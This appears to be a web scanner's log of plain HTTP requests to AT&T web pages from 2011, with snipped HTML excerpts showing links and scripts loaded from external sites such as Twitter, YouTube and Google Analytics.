GET /gen/landing-pages?wtSlotClick=1-0062GT-0-4&pid=6080 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Tue, 06 Sep 2011 11:07:29 GMT Content-Length: 21286 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en ...[SNIP]... </script> <script src="http://platform.twitter.com/anywhere.js?id=Rc9v04Pwuci6YhDGrfbuA&v=1"></script> ...[SNIP]... <p>FierceWireless recently named Kris Rinne, AT&T senior vice president, architecture and planning, as their <a href="http://www.fiercewireless.com/special-reports/2011-most-influential-women-wireless/1-kris-rinne-senior-vice-president-architecture" title="2011 Most Influential Woman in Wireless" target="_blank">2011 Most Influential Woman in Wireless</a> ...[SNIP]... <p> <a href="http://www.youtube.com/watch?v=IvNeiXgKSfc" title="FierceWireless Names AT&T...s Kris Rinne, 'Most Influential Woman in Wireless'" target="_blank"> <img src="/Common/about_us/images/landing_pages/fiercewireless_ts.jpg" alt="" width="250" height="250" border="0" style="margin:0px 15px 0 0;"/> ...[SNIP]... <li><a href="http://www.attinnovationspace.com/" title="Innovation Space Blog">Innovation Space Blog</a> ...[SNIP]... <li id="Facebook_link"><a href="http://www.facebook.com/ATT" title="Discuss on Facebook">Discuss on Facebook</a> ...[SNIP]... </h3> <iframe id="twitter_iframe" frameborder="0" scrolling="No" src="http://twitteraggregator.att.centralcast.net/atttweets.aspx?groupid=2&nbrOfTweetsToShow=3&tweetListName=none&view=list" style="height:295px;width:210px;_width:200px;font:10px Arial, Helvetica, sans-serif;"></iframe> <p><a href="http://www.twitter.com/att/">Go to Twitter.com to follow us</a> ...[SNIP]...
GET /gen/press-room?wtSlotClick=1-0062GT-0-3&pid=2943 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33607
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script> ...[SNIP]... <noscript> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="950" height="22" id="Ticker" align="middle"> <param name="allowScriptAccess" value="sameDomain" /> ...[SNIP]... </param><embed src="http://www.youtube.com/v/8KLbvnKv67k?version=3&hl=en_US" width="300" type="application/x-shockwave-flash" height="220" allowscriptaccess="always" allowfullscreen="true" movie="http://www.youtube.com/v/8KLbvnKv67k?version=3&hl=en_US" wmode="transparent"></embed> ...[SNIP]... <p style="width:auto !important;">Watch our video on <a href="http://www.youtube.com/watch?v=Wr6kvZ1r378%20" title="Watch our video on international roaming with AT&T" target="_blank">international roaming with AT&T</a> ...[SNIP]... <li><a href="http://www.dallasnews.com/sharedcontent/dws/bus/stories/DN-stephenson_19bus.ART.State.Edition1.26c3623.html" title="Dallas Morning News: AT&T CEO Randall Stephenson offers his take on the company and its future" target="_blank"><em> ...[SNIP]... <li><a href="http://www.pcmag.com/article2/0,2817,2364263,00.asp" title="PC Magazine: The Fastest Mobile Networks 2010" target="_blank">PC Magazine: The Fastest Mobile Networks 2010</a> ...[SNIP]... <li><a href="http://www.pcworld.com/article/189592/atandt_roars_back_in_pcworlds_second_3g_wireless_performance_test.html" title="PCWorld: AT&T Roars Back in PCWorld’s Second 3G Wireless Performance Test" target="_blank">PCWorld: AT&T Roars Back in PCWorld's Second 3G Wireless Performance Test</a> ...[SNIP]... <li><a href="http://cell-phone-providers-review.toptenreviews.com/cingular-review.html" title="TopTenReviews.com: AT&T 2010 Cell Phone Providers Review" target="_blank">TopTenReviews.com: AT&T 2010 Cell Phone Providers Review</a> ...[SNIP]... <li><a href="http://www.theiphoneblog.com/2010/01/12/att-iphone-customers-increased-3g-data-speeds/" title="The iPhone Blog: Some AT&T iPhone users seeing increased 3G data speeds?" class="shortLine">The iPhone Blog: Some AT&T iPhone users seeing increased 3G data speeds?</a> ...[SNIP]... <li><a href="http://www.nytimes.com/2009/12/28/opinion/28raff.html" title="The New York Times: Search, but you may not find" target="_blank" class="shortLine"><em> ...[SNIP]... <li><a href="http://gizmodo.com/5428343/our-2009-12+city-3g-data-mega-test-att-won" title="Gizmodo: Our 2009 12-City 3G Data Mega Test: AT&T Won" target="_blank" class="shortLine">Gizmodo: Our 2009 12-City 3G Data Mega Test: AT&T Won </a> ...[SNIP]... <li><a href="http://www.engadget.com/2009/05/26/engadget-labs-the-best-mobile-broadband-carrier-in-america/" title="Engadget: The best mobile data carrier in America" target="_blank" class="shortLine">Engadget: The best mobile data carrier in America</a> ...[SNIP]... <div class="logos"> <a href="http://www.ctia.org/" class="firstLogo"><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/CTIA.gif" alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For detai ls, visit www.ctia.org" title="The ...[SNIP]... </a> <a href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221" target="_blank" ><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/BBB.gif" alt="Click to verify BBB accreditation and to see a BBB report." title="Click to verify BBB accreditation and to see a BBB ...[SNIP]... </a> <a href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101" target="_blank"><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/Truste.gif" alt="This site is certif ied by TRUSTe" title="This site is certified by TRUSTe" /></a> <a href="http://www.yellowpages.com" target="_blank"><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/ypcom.gif" alt="YP.com - the new yellowpages.com" title="YP.com - the new yellowpages.com" /> ...[SNIP]... </a> <a href="http://www.realpageslive.com" target="_blank"><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/DWYPgs.gif" alt="Digital White & Yellow Pages" title="Digital White & Yellow Pages" class="yellowpages" /> ...[SNIP]...
GET /gen/privacy-policy?pid=2587 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:31 GMT Content-Length: 13043 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/ ...[SNIP]... </script> <script src="http://platform.twitter.com/anywhere.js?id=Rc9v04Pwuci6YhDGrfbuA&v=1"></script> ...[SNIP]... <!-- START CONTENT AREA -->
<script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script> ...[SNIP]... <div class="logos"> <a href="http://www.ctia.org/" class="firstLogo"><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/CTIA.gif" alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For detai ls, visit www.ctia.org" title="The ...[SNIP]... </a> <a href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221" target="_blank" ><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/BBB.gif" alt="Click to verify BBB accreditation and to see a BBB report." title="Click to verify BBB accreditation and to see a BBB ...[SNIP]... </a> <a href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101" target="_blank"><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/Truste.gif" alt="This site is certif ied by TRUSTe" title="This site is certified by TRUSTe" /></a> <a href="http://www.yellowpages.com" target="_blank"><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/ypcom.gif" alt="YP.com - the new yellowpages.com" title="YP.com - the new yellowpages.com" /> ...[SNIP]... </a> <a href="http://www.realpageslive.com" target="_blank"><img src="//www.att.com/homepage/Common/indc/homepage/images/footer/DWYPgs.gif" alt="Digital White & Yellow Pages" title="Digital White & Yellow Pages" class="yellowpages" /> ...[SNIP]...
HTTP/1.1 200 OK Server: Apache P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 95447 Date: Tue, 06 Sep 2011 11:09:04 GMT Connection: close Set-Cookie: TLTHID=A1826430D87810D8CFDA87CC26200058; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:09:04 GMT; path=/
...[SNIP]... <!-- Required for slider operation: See http://docs.jquery.com/UI/Slider for documentation --> <link href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
<!-- stylesheets for nyro modal implemented for slideshows and tutorials launchs (ECOM 2010.11) --> ...[SNIP]... <!-- Required for slider operation: See http://docs.jquery.com/UI/Slider for documentation --> <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /homepage/index.jsp?locale=es_US HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="La primera empresa telefónica nacional en recibir el Sello de Calidad Móvil. Para más detalles, visitar www.ctia.org" alt="La primera empresa telefónica nacional ...[SNIP]... </a>
GET /learningcenter/?wtSlotClick=1-006E1O-0-1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html lang="en"> <head> <title>4G Speed from AT&T - AT&T 4G with HSPA+ and LTE ...[SNIP]... <li><a href="http://yellowpages.com/" name="Support_Additional Services_Yellow Pages" >Yellow Pages</a> ...[SNIP]... <br> <a href="http://www.attinnovationspace.com/2010/12/01/more-than-one-acronym-for-speed/">Read CTO John Donovan's 4G blog</a><a href="http://www.attinnovationspace.com/2010/12/01/more-than-one-acronym-for-speed/"><img src="assets/link-arrow.png" style="margin-left:7px; vertical-align:middle;" /> ...[SNIP]... <div class="logoBlock"> <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a> <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a> <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a> <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a> <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /shop/bundles/index.jsp?wtSlotClick=1-004YGZ-0-1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en_US"> <head> <meta NAME="DCS ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock"> <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a> <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a> <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a> <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a> <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /shop/home-phone/index.jsp?wtSlotClick=1-004YH0-0-3&tab=2 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock"> <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a> <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a> <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a> <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a> <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /shop/internet/index.jsp?wtSlotClick=1-005RAV-0-1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="btmLink"><a href="http://secure.sbc.com/support/faq.adp?wtSlotClick=1-00635G-0-1" onclick="">Learn more <img src="/media/att/2011/global/btn/img_blue_arrow_9x13_AA000OM4.gif"> ...[SNIP]... <li><a href="http://attwb.net/?wtSlotClick=1-005XAA-0-4" onclick=" ; javascript:dotComPopUp(this.href, 1024, 768);return false;" >AT&T Broadband via Satellite</a> ...[SNIP]... <li><a href="http://www.attwifi.com/" onclick=" ; javascript:dotComPopUp(this.href, 1024, 768);return false;" >AT&T Wi-Fi</a> ...[SNIP]... <div class="logoBlock"> <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a> <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a> <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a> <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a> <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /shop/special-offers/index.jsp?wtSlotClick=1-00679Z-0-3 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html lang="en"> <head> <meta NAME="DCSext.wtSlotContent" CONTENT="1~00598I"/> <title>AT&T S ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <li><a href="http://secure.sbc.com/support/faq.adp?wtSlotClick=1-005X61-0-5" onclick=" ; javascript:dotComPopUp(this.href, 1024, 768);return false;" >Wi-Fi</a> ...[SNIP]... <div class="logoBlock"> <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a> <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a> <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a> <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a> <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /shop/tv/index.jsp?wtSlotClick=1-005RA9-0-1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock"> <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a> <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a> <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a> <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a> <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /shop/u-verse/index.jsp?wtSlotClick=1-004YN5-0-4 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock"> <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a> <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a> <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a> <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a> <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /shop/wireless/index.jsp?wtSlotClick=1-005YH4-0-5 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <!-- METEOR CAMPAIGN AND HAS KEYS TO BE ADDED --> <html lang="en"> <head> <meta NAME="DCSext ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock"> <a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a> <a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a> <a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a> <a target="_blank" href="http://www.yellowpages.com/"><img title="YELLOWPAGES.COM" alt="YELLOWPAGES.COM" src="//www.att.com/media/att/2011/global/nav/en_US/logoYP.png"></a> <a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]... <noscript><iframe src="http://switch.atdmt.com/iaction/cntcin_GeneralVisitorsUAT_10" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe> ...[SNIP]...
GET /u-verse/explore/911.jsp?wtSlotClick=1-0056MV-0-2 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>AT&T U-ve ...[SNIP]... <li><a href="http://uversetv.att.yahoo.com" name="Shop_Digital TV_Manage My DVR" >Manage My DVR</a> ...[SNIP]... <div class="logoBlock">
<a target="_blank" href="http://www.ctia.org/"><img title="The first nationwide carrier to be awarded the Seal of Wireless Quality. For details, visit www.ctia.org." alt="The first nationwide carrier to be awarded the Seal of Wireless Quality. For ...[SNIP]... </a>
<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
